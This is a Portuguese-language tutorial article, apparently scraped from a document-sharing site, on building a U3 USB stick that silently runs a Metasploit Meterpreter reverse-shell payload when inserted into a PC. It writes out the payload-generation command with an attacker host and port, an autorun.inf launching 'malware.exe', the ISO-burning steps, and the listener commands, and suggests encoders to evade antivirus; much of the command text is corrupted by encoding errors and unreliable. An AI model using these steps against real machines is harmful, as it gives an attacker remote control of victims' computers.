ataque usb u3 com metasploit [artigo]
![Download Ataque USB U3 Com Metasploit [Artigo]](https://vdocuments.com.br/public/t1/desktop/images/cloud_download_icon2.png)
DESCRIPTION
Ataques USB com MetasploitArtigo.TRANSCRIPT
-
28/01/13 Ataque USB U3 com Metasploit [Artigo]
1/2segurancalinu[.com/artigos/impressora.php?codigo=10336
Ataque USB U3 com MetasploitAutor: Luiz VieiraData: 17/10/2010
O Ataque
1 - O AtaqueEm 4 passos simples iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize umaconexo reversa com o Meterpreter.A idia gerar, com o Metasploit, um arquivo executvel com um payload para gerar uma conexo reversa aoconectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa UniversalCustomizer.
1. Gerar o payload com o MetasploitNeste caso vamos criar um executvel com uma conexo reversa do Meterpreter:./mVfpa\load ZindoZV/meWeUpUeWeU/UeYeUVe_Wcp LHOST=1.1.1.1 LPORT=443 X > malZaUe.e[eObviamente que podemos utilizar qualquer payload, como tambm utilizar encoders para tornar mais difcil suadeteco por antivrus.
2. Criar nossa ISOUma vez que tenhamos baixado e descompactado o Universal Customizer(http://www.hak5.org/packages/files/Universal_Customizer.zip), copiamos o arquivo malware.exe para o diretrio"U3CUSTOM" e criamos o arquivo "autorun.inf" com o seguinte conte~do:[AutoRun]open=malware.exeAps isso, executamos o "ISOCreate.cmd" e dentro do diretrio "BIN" ser criada nossa ISO com o nome"U3CUSTOM.ISO". Se no criarmos nossa ISO , o Universal Customizer utilizar a ISO "U3CUSTOM.ISO" que jvem dentro do pacote, com uma verso feita por Hacksaw.
3. Gravar a ISOIniciamos o Universal Customizer e vamos seguindo os passo:
Ao finalizar, retiramos o pendrive, e quando voltarmos a conect-lo j teremos nosso payload sendo executado.
-
28/01/13 Ataque USB U3 com Metasploit [Artigo]
2/2segurancalinu[.com/artigos/impressora.php?codigo=10336
4. Aguardando a conexmo reversaPara finalizar, devemos deixar o meterpreter "escutando" espera da conexo reversa que ser feita pelopayload gravado no pendrive:./mVfconVoleXVe e[ploiW/mXlWi/handleUVeW PAYLAOD ZindoZV/meWeUpUeWeU/UeYeUVe_WcpVeW LHOST 1.1.1.1VeW LPORT 443VeW E[iWOnSeVVion falVee[ploiW -jIsso tudo, que serve inclusive como uma prova de conceito para comprovar a segurana da mquina de umusurio.
LINKS RELACIONADOS:http://www.infoseczen.com/?p=127http://www.slideshare.net/seguinfo/sallis-usb-hackshttp://www.hak5.org/packages/files/Universal_Customizer.zip
http://segurancalinux.com/artigo/Ataque-USB-U3-com-Metasploit Voltar para o site